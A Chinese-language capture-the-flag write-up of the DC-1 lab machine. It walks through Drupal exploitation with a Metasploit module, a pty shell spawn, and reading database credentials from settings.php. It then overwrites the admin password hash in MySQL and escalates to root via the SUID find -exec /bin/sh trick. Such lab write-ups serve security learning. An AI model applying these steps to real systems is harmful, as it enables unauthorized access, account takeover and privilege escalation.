DC-1渗透笔记SUID-find提权

首先；一开始的不变的是扫描：

端口扫描：

22端口：ssh协议

目录扫描（御剑/dirsearch）：其实扫描半天也没什么东西

随便瞅几个，基本没什么太大用处；

既然如此，回来打开首页：

先看看指纹识别：

看到是drupal，所以想到可以用msf中的框架来扫描看看能不能直接建立连接：

search drupal

使用模块1

按要求添加好设置

show options
set rhosts 192.168.134.130

接着执行，(run)即可建立连接

接下来可直接在当前目录下通过ls -al发现有flag1.txt,直接cat来查看一下：

说是要找config,就来到sites目录下看看（就是简单的查看各种文件）

通过一顿查找，来到这个目录下：/var/www/sites/default

ls -al

查看settings.php文件，在文件一开始的地方有flag2.txt以及意料之外的东西：（数据库）

很明显要连接数据库；在连接数据库之前，先来获取一个叫交互式shell:

（且，meterpreter中能进行的命令比较少，所以，当我们通过msf成功连接之后，一般选择直接进入系统下的shell）

shell

python -c "import pty; pty.spawn('/bin/bash')"

whoami的回显是www-data就表示成功；（示例如下）

接着，来连接数据库：

www-data@DC-1:/var/www/sites/default$ mysql -u dbuser -p
mysql -u dbuser -p
Enter password: R0ck3t

接下来就是查看数据了：

show databases;
use drupaldb
show tables;

发现有users表，查看一下：

select * from users;

• 记得mysql语句最后要写分号“；”
• 

一开始拿到这个我没发现他是什么加密方式，后来试了好几种方式也没破解出来，索性不破了，直接把admin用户的密码改了试试看：

update users set pass='admin' where uid=1;

发现虽然能更改成功，但是在后台还是登录不进去，额，看来没有捷径可以走了，只能老老实实去看看有没有对应的加密密码的文件；

结果当然是有的，在/var/www/scripts目录下有一个password-hash.sh文件，就是这个网站的密码加密文件，来使用他来给我们自己的密码进行加密，再跟原来的密码进行替换，应该就可以了：

加密密码：

www-data@DC-1:/var/www$ scripts/password-hash.sh asd
scripts/password-hash.sh asd

password: asd           hash: $S$DVrHGnghwNNQEQuKp4LFQpCYod1Zc1CXhA202KuO3HHp2pEfAAxC

之后来到数据库更改密码：

update users set pass='$S$DVrHGnghwNNQEQuKp4LFQpCYod1Zc1CXhA202KuO3HHp2pEfAAxC' where uid=1;

修改成功，来到后台直接登录，

成功拿到flag3.txt

再次回到之前的交互式会话那里，我们用find命令来查看可不可以直接找到flag文件：

find / -name "*flag*"

直接cat flag4.txt:

提示要提权→SUID-find提权

首先来查看具有suid权限的文件：

find / -perm -u=s -type f 2>/dev/null
#/: 这表示搜索的根目录，也就是整个文件系统。
#-perm -u=s: 这部分是一个参数，它告诉find命令查找那些拥有SUID权限的文件。
#-perm: 这是用于指定文件权限的选项。
#-u=s: -u 表示用户权限，s 表示SUID权限。
#-type f: 这部分指定只查找文件，而不是目录。
#2>/dev/null: 这部分是将标准错误输出（stderr）重定向到 /dev/null，
#这样任何错误信息将不会显示在屏幕上。这是为了防止在搜索过程中出现的权限错误信息干扰到输出。

有find命令，采用find提权：

touch test;
#保证有test文件
find / type f -name test -exec "/bin/sh" \;

成功拿到最终的flag文件